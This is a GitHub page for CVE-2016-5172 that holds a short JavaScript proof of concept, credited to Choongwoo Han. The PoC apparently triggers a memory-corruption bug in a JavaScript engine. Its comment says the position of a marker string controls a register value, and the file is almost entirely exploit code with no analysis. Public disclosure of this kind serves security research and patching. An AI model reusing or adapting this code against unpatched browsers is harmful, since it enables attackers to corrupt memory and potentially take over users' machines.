Skip to content

Latest commit

 

History

History
23 lines (18 loc) · 424 Bytes

CVE-2016-5172.md

File metadata and controls

23 lines (18 loc) · 424 Bytes
Raw

CVE-2016-5172

  • Date: Jun 2016
  • Credit: Choongwoo Han

PoC

this.__defineSetter__("x", function(){});
function go (y = (function rec(a1, a2) {
    // The position of "AAAA" controls a register value.
    if (a1.length == a2) { b = "CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCAAAA"; }
    rec(a1, a2 + 1);
})([,], 0)
        , b = eval("")
        )
{}
go(x);

Reference